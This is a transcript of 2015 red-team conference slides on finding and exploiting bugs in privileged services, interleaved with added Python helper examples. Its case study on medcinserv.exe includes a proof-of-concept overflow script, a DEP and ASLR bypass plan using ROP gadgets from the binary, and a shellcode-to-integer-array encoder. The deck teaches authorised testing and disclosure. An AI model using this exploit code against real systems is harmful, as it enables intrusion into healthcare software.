Software vulnerability discovery and exploitation during red team assessments

Software Vulnerability Discovery & Exploitation During Red Team Assessments. Ryan Wincey, [email protected], 9/30/2015.

Transcript of Software vulnerability discovery and exploitation during red team assessments

Page 1: Software Vulnerability Discovery & Exploitation During Red Team Assessments

Ryan Wincey [email protected]

9/30/2015

Page 2: Background

• Long term red team assessments

• Persistence with remote access tools

• Looking for alternative means of network propagation or privilege escalation

Page 3: Identify Targets

• Look for applications that are listening on sockets or running at a higher privilege level

• Windows: netstat -ano | findstr LISTEN (the last column is the owning PID)

Page 4: Identify Targets

• Look for applications that are listening on sockets or running at a higher privilege level

• Windows: tasklist /v | findstr <pid> (the User Name column shows the account the process runs as; tasklist /v /fo csv gives the same data in a parseable form)

Page 5: Identify Targets

• Look for applications that are listening on sockets or running at a higher privilege level

• Linux: netstat -anop | grep LISTEN, then ps -ef | grep <pid> (the -p column only shows the PID for sockets owned by other users when run as root; ss -lntp gives the same view on newer systems)
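As an added example (not from the deck), the two Windows commands above joined into one triage pass: parse `netstat -ano`, keep only bound sockets, look up each PID's image and account in `tasklist /v /fo csv` (the CSV form of the page 4 command), and sort network-reachable services running as SYSTEM to the top. Both command outputs embedded below are constructed samples; exampleserv.exe, userapp.exe and the PIDs are made up.

```python
"""Added example: join `netstat -ano` with `tasklist /v /fo csv` to rank listening services.
Both samples below are constructed for the example; exampleserv.exe is a made-up service."""
import csv
import io
import re

NETSTAT_LINE = re.compile(
    r"^\s*(?P<proto>TCP|UDP)\s+(?P<local>\S+)\s+(?P<remote>\S+)\s+"
    r"(?:(?P<state>[A-Z_]+)\s+)?(?P<pid>\d+)\s*$"
)
SYSTEM_ACCOUNT = "NT AUTHORITY\\SYSTEM"
SERVICE_PREFIXES = ("NT AUTHORITY\\", "NT SERVICE\\")   # built-in and virtual service accounts

# Constructed `netstat -ano` output (not captured from a real host).
NETSTAT_SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       796
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:8000           0.0.0.0:0              LISTENING       1832
  TCP    127.0.0.1:5555         0.0.0.0:0              LISTENING       2210
  TCP    192.168.1.10:49153     192.168.1.20:445       ESTABLISHED     4
  UDP    0.0.0.0:500            *:*                                    1040
"""

# Constructed `tasklist /v /fo csv` output; CSV is easier to parse than `tasklist /v | findstr <pid>`.
TASKLIST_SAMPLE = '''"Image Name","PID","Session Name","Session#","Mem Usage","Status","User Name","CPU Time","Window Title"
"System","4","Services","0","1,234 K","Unknown","NT AUTHORITY\\SYSTEM","0:00:10","N/A"
"svchost.exe","796","Services","0","9,876 K","Unknown","NT AUTHORITY\\NETWORK SERVICE","0:00:01","N/A"
"svchost.exe","1040","Services","0","5,000 K","Unknown","NT AUTHORITY\\SYSTEM","0:00:00","N/A"
"exampleserv.exe","1832","Services","0","20,480 K","Unknown","NT AUTHORITY\\SYSTEM","0:00:03","N/A"
"userapp.exe","2210","Console","1","8,000 K","Running","WORKSTATION\\alice","0:00:00","User App"
'''


def parse_netstat(text):
    """Bound sockets from `netstat -ano`: TCP in LISTENING plus every UDP socket (UDP has no state column)."""
    sockets = []
    for line in text.splitlines():
        m = NETSTAT_LINE.match(line)
        if not m:
            continue
        if m.group("proto") == "TCP" and m.group("state") != "LISTENING":
            continue
        host, _, port = m.group("local").rpartition(":")   # rpartition keeps IPv6 forms like [::]:135 intact
        sockets.append({"proto": m.group("proto"), "host": host, "port": int(port), "pid": int(m.group("pid"))})
    return sockets


def parse_tasklist_csv(text):
    """PID -> (image name, user name) from `tasklist /v /fo csv`."""
    return {int(r["PID"]): (r["Image Name"], r["User Name"]) for r in csv.DictReader(io.StringIO(text))}


def triage(netstat_text, tasklist_text):
    """Annotate each bound socket with its owner and sort the best targets first:
    reachable from the network and running as SYSTEM, then other service accounts, then the rest."""
    procs = parse_tasklist_csv(tasklist_text)
    rows = []
    for s in parse_netstat(netstat_text):
        image, user = procs.get(s["pid"], ("<unknown>", "<unknown>"))
        s["image"], s["user"] = image, user
        s["is_system"] = user.upper() == SYSTEM_ACCOUNT
        s["service_account"] = user.upper().startswith(SERVICE_PREFIXES)
        s["remote_reachable"] = s["host"] not in ("127.0.0.1", "[::1]")
        rows.append(s)
    return sorted(rows, key=lambda s: (not s["remote_reachable"], not s["is_system"],
                                       not s["service_account"], s["port"]))


if __name__ == "__main__":
    for r in triage(NETSTAT_SAMPLE, TASKLIST_SAMPLE):
        print("%-3s %-22s pid=%-5d %-18s %s" % (r["proto"], "%s:%d" % (r["host"], r["port"]),
                                               r["pid"], r["image"], r["user"]))
```

Run it on the target's real output by replacing the two sample strings with the saved command output; the ESTABLISHED connection in the sample is dropped, and the loopback-only listener sorts last because it cannot be reached from another host.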

Page 6: Static Analysis

• Reverse Engineering Software
  – IDA Pro/Hex-Rays
  – Hopper
  – Other

• Target Binary

Page 7: Static Analysis

• Helpful bug hunting tips

– Identify areas where data is introduced from outside of the application
  • Command line parameters
  • Socket reads
  • File reads
  • Environment variables
  • e.g. read, gets, fread, fgets, recv, recvfrom

Page 8: Static Analysis

• Helpful bug hunting tips

– Trace those inputs to parsing functions; look for interesting functions and memory operations
  • strcpy, strcat
  • sprintf, printf
  • memcpy
  • system
  • any custom string or memory copies
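The two tips above (find where input enters, trace it to the sinks) as one added example that is not from the deck: a call graph exported from the disassembler as (caller, callee) pairs is walked from every function that calls an input routine, and each function on the way that calls a risky copy or format routine is reported together with the path that reached it. The edge list and every function name in it (parse_args, accept_client, handle_packet, ...) are constructed for illustration and are not medcinserv's call graph.

```python
"""Added example: rank source-to-sink paths over a call graph exported from the disassembler.
The edge list is constructed with hypothetical function names; it is not medcinserv's call graph."""
from collections import defaultdict, deque

# Where data enters the process (page 7) and where it is copied or interpreted unsafely (page 8).
INPUT_SOURCES = {"read", "gets", "fread", "fgets", "recv", "recvfrom", "getenv", "GetCommandLineA"}
DANGEROUS_SINKS = {"strcpy", "strcat", "sprintf", "printf", "memcpy", "system"}

# Constructed (caller, callee) pairs, the shape you get by dumping xrefs from IDA or Hopper.
CALL_EDGES = [
    ("main", "parse_args"),
    ("main", "serve"),
    ("parse_args", "GetCommandLineA"),
    ("parse_args", "strcpy"),
    ("serve", "accept_client"),
    ("accept_client", "recv"),
    ("accept_client", "handle_packet"),
    ("handle_packet", "parse_header"),
    ("handle_packet", "memcpy"),
    ("parse_header", "printf"),
    ("log_line", "sprintf"),           # a sink with no external input feeding it: not interesting yet
]


def build_call_graph(edges):
    callees = defaultdict(set)
    for caller, callee in edges:
        callees[caller].add(callee)
    return callees


def source_to_sink_paths(edges, sources=INPUT_SOURCES, sinks=DANGEROUS_SINKS, max_depth=6):
    """Walk from every function that reads external input down through its callees and report
    each function along the way that calls a dangerous sink, with the path that got there.
    A function is 'internal' when it appears as a caller; leaves like recv or strcpy are not expanded."""
    graph = build_call_graph(edges)
    internal = {caller for caller, _ in edges}
    results = []
    for entry in sorted(f for f in internal if graph[f] & sources):
        entry_sources = sorted(graph[entry] & sources)
        queue = deque([(entry, [entry])])
        seen = {entry}
        while queue:
            func, path = queue.popleft()
            hit = sorted(graph[func] & sinks)
            if hit:
                results.append({"sources": entry_sources, "path": path, "sinks": hit})
            if len(path) >= max_depth:
                continue
            for callee in sorted(graph[func]):
                if callee in internal and callee not in seen:
                    seen.add(callee)
                    queue.append((callee, path + [callee]))
    # Shortest source-to-sink distance first: the fewest parsing layers between recv() and memcpy()
    return sorted(results, key=lambda r: (len(r["path"]), r["path"]))


if __name__ == "__main__":
    for r in source_to_sink_paths(CALL_EDGES):
        print("%-16s -> %-45s -> %s" % (",".join(r["sources"]), " -> ".join(r["path"]), ",".join(r["sinks"])))
```

The output is a worklist for the decompiler, not a verdict: each reported function still has to be read to see whether the length reaching the sink is attacker-controlled, and functions such as log_line that never see external input drop out, which is what keeps the list short on a large binary.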

Page 9: Dynamic Analysis

Checklist

• In order to perform dynamic analysis, we will need to ensure that the application will run in our test environment.

• Tips for getting the application to run.
  – Zip up support files in the same directory (7za, zip)
  – Listdlls.exe, ldd: loaded libraries
  – Handle.exe, /proc/<pid>/fd: open files
  – Procmon.exe: identify registry keys
  – Read log files: track down missing files or registry settings

Page 10: Analyzing Process Memory

• Comparing the running process environment to your test environment.

• Windows: procdump.exe /accepteula -ma <pid> <dump file>

• Linux: gdb -p <pid> (gdb attach <pid> also works); gcore <pid> writes a core file comparable to a full procdump dump. On distributions with Yama, attaching to a process you did not spawn needs root unless /proc/sys/kernel/yama/ptrace_scope is 0.

Page 11: Crash Dumps

• In the event that you crash the application and want to collect crash dumps.

• Windows: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps
  – DumpFolder (REG_EXPAND_SZ; defaults to %LOCALAPPDATA%\CrashDumps, so set it explicitly for a service running as SYSTEM)
  – DumpCount (REG_DWORD; defaults to 10)
  – DumpType (REG_DWORD; 0 = custom, 1 = mini dump, 2 = full dump)
  – CustomDumpFlags (REG_DWORD; MINIDUMP_TYPE flags, only consulted when DumpType is 0)

• Linux: ulimit -c unlimited (where the core file lands is governed by /proc/sys/kernel/core_pattern)

Page 12: Case Study: medcinserv.exe

IAVM Notice Number: 2015-A-0127

• Identify target and binary location

Page 13: Case Study: medcinserv.exe

• Identify target and binary location

Page 14: Case Study: medcinserv.exe

• Static analysis using IDA Pro and the Hex-Rays decompiler.

Page 15: Case Study: medcinserv.exe

• Static analysis using IDA Pro and the Hex-Rays decompiler.

Page 16: Case Study: medcinserv.exe

• Static analysis using IDA Pro and the Hex-Rays decompiler.

Page 17: Case Study: medcinserv.exe

• Locate additional dependencies

Page 18: Case Study: medcinserv.exe

• Locate additional dependencies

Page 19: Case Study: medcinserv.exe

• Locate additional dependencies

Page 20: Case Study: medcinserv.exe

• Query service details in the registry: HKLM\SYSTEM\CurrentControlSet\Services\<service name> holds ImagePath (binary path and arguments), ObjectName (the account the service runs as) and Start (start type); sc qc <service name> shows the same fields.

Page 21: Case Study: medcinserv.exe

• Set up an environment as nearly identical to the target as possible
  – Operating system
  – File system
  – Service registration
  – Debugging tools
  – Scripting support

Page 22: Case Study: medcinserv.exe

• Set breakpoint on our vulnerable function

Page 23: Case Study: medcinserv.exe

• Set breakpoint on our vulnerable function

Page 24: Case Study: medcinserv.exe

• POC Skeleton

– Define Protocol
  [ Message Type : 2 bytes ][ Data Length : 4 bytes ][ Data ]

– Choose Implementation
  Python, Ruby, PowerShell, C

– Code up the boilerplate / use a template
  Socket connect, send, recv, formatting

Page 25: Case Study: medcinserv.exe

• POC Skeleton

import socket
import struct
import sys


def send(msg_type, pack_len, data=None):
    # The server expects a length between 6 and 0x3d090; this is only a warning,
    # so out-of-range (even negative) lengths can still be sent while trying things.
    if pack_len < 6 or pack_len > 0x3d090:
        print("Length must be between 6 and 0x3d090 bytes.")

    # Set the type: 2 bytes, big-endian
    buf = struct.pack('>h', msg_type)

    # Send length, must be less than 0x3d090, can be negative: 4 bytes, big-endian
    buf += struct.pack('>i', pack_len)

    # Send data
    if pack_len > 0 and data:
        buf += data
    try:
        csock.sendall(buf)
    except socket.error:
        pass


if len(sys.argv) == 3:
    (progname, host, port) = sys.argv
else:
    print('Usage: {0} host port'.format(sys.argv[0]))
    sys.exit(1)

csock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
csock.connect((host, int(port)))
csock.settimeout(1)

print("[+] connected to server.")

# Try things
i = 238                    # message type under test
data = b"1," * 1000        # integer array: 1000 comma-separated entries

print("[+] sending data.")
send(i, len(data) + 6, data)

csock.close()
print("[+] goodbye")

Page 26: Case Study: medcinserv.exe

• We own EIP

Page 27: Case Study: medcinserv.exe

• Our target environment, Windows 7 SP1, has DEP, ASLR, and SafeSEH on all OS libraries.

• medcinserv.exe doesn't have any of these built in (not linked with /DYNAMICBASE or /SAFESEH), so its image loads at a fixed base.

Page 28: Case Study: medcinserv.exe

• Bypass DEP by changing the execution permissions of the stack dynamically.

• Change permissions using a ROP chain composed of gadgets from the medcinserv binary.

• Bypass ASLR because the ROP gadgets in the medcinserv binary are at static addresses.

• NULL bytes are allowed since it's an integer array buffer overflow: the payload travels as decimal text and the server converts each entry to a 4-byte integer, so any byte value, 0x00 included, can be written.

Page 29: Case Study: medcinserv.exe

• ROP gadgets generated for VirtualAlloc

• Resolve VirtualAlloc using GetModuleHandle and GetProcAddress: kernel32 itself is randomized, so the chain reaches those two through the binary's own import table, which sits at a fixed address, rather than hardcoding a kernel32 pointer.

Page 30: Case Study: medcinserv.exe

• Exploit Design Structure

Page 31: Case Study: medcinserv.exe

• Shellcode to String Array Function

import struct

data = ""   # comma-separated integer array that becomes the message body


def add_shellcode(sc):
    global data

    # Determine the iterator: number of 4-byte entries, rounding up
    shellcode_len = len(sc)
    iterator = shellcode_len // 4
    if shellcode_len % 4 > 0:
        iterator += 1

    counter = 0
    for i in range(int(iterator)):
        entry = sc[(i * 4):(i * 4) + 4]

        # Make sure length is four bytes; pad a short tail with NOPs
        len_entry = len(entry)
        if len(entry) < 4:
            entry += b"\x90" * (4 - len_entry)
        # Each 4-byte little-endian group becomes one decimal entry in the array
        data += str(struct.unpack("<I", entry)[0]) + ","

        counter += 1

    return counter
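Added example, not the deck's code: the page 24 frame and the integer-array encoding above carried through in both directions, so the byte stream the server will reconstruct can be checked against the payload before anything is sent. pack_message, unpack_message, encode_int_array, decode_int_array and build_frame are this example's own names; the nine-byte SAMPLE_PAYLOAD is constructed filler containing NUL bytes, not shellcode; the 6..0x3d090 length bound is the one the POC's send() warns about. The decode side is why the NULL-byte point on page 28 holds: the wire form is digits and commas, and each decimal entry becomes four arbitrary bytes in memory.

```python
"""Added example: [type:2][length:4][data] framing plus integer-array encode/decode.
Function names are this example's own; the sample payload below is constructed."""
import struct

HEADER_LEN = 6          # 2-byte type + 4-byte length, both big-endian (page 24)
MAX_LEN = 0x3d090       # upper bound the POC's send() warns about
NOP = 0x90


def pack_message(msg_type, data):
    """Frame data the way the POC does: the length field counts header plus data."""
    return struct.pack(">hi", msg_type, len(data) + HEADER_LEN) + data


def unpack_message(buf):
    """Receiver-side view: (type, declared length, data, whether the length is sane)."""
    msg_type, declared = struct.unpack(">hi", buf[:HEADER_LEN])
    data = buf[HEADER_LEN:]
    # A negative or oversized length fails here; a server that skips this check is the fuzz target.
    length_ok = HEADER_LEN <= declared <= MAX_LEN and declared == len(buf)
    return msg_type, declared, data, length_ok


def encode_int_array(payload, pad=NOP):
    """Raw bytes -> 'n1,n2,...,' with one unsigned 32-bit little-endian int per 4 bytes.
    Returns (text, entry_count); a short tail is padded with NOPs like add_shellcode does."""
    entries = []
    for off in range(0, len(payload), 4):
        chunk = payload[off:off + 4]
        chunk += bytes([pad]) * (4 - len(chunk))
        entries.append(str(struct.unpack("<I", chunk)[0]))
    return ",".join(entries) + ",", len(entries)


def decode_int_array(text):
    """What the server reconstructs in memory: each decimal entry back to 4 little-endian bytes.
    Because the wire form is ASCII digits and commas, 0x00 bytes in the payload survive the trip."""
    out = bytearray()
    for field in text.split(","):
        if not field:
            continue                      # trailing comma
        value = int(field, 10)
        if not 0 <= value <= 0xFFFFFFFF:
            raise ValueError("entry does not fit a 32-bit integer: %d" % value)
        out += struct.pack("<I", value)
    return bytes(out)


def build_frame(msg_type, payload):
    """Complete message for an integer-array payload, ready for socket.sendall()."""
    text, _ = encode_int_array(payload)
    return pack_message(msg_type, text.encode("ascii"))


# Constructed sample payload: nine bytes including NULs, NOT real shellcode.
SAMPLE_PAYLOAD = b"\x31\xc0\x50\x68\x00\x00\x00\x00\xcc"

if __name__ == "__main__":
    frame = build_frame(238, SAMPLE_PAYLOAD)
    msg_type, declared, body, ok = unpack_message(frame)
    print("type=%d declared_len=%d length_ok=%s body=%s" % (msg_type, declared, ok, body.decode()))
    print("decoded:", decode_int_array(body.decode()).hex())
```

Round-tripping the payload through decode_int_array before sending catches the two mistakes this encoding invites: a tail that is not a multiple of four (padded, so the decoded buffer is longer than the input) and an entry that does not fit in 32 bits, which the server would never reconstruct as intended.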

Page 32: DEMO

Page 33: Test Exploit

• Test in as nearly identical environment as possible

• Non-critical systems, preferably when users are away

• Make sure to get permission

• Get more shellz

Page 34: Reporting

• US-CERT (coordinated disclosure to the vendor)

• MITRE (CVE assignment)

• NIST (NVD entry)

Page 35: QUESTIONS?

[email protected]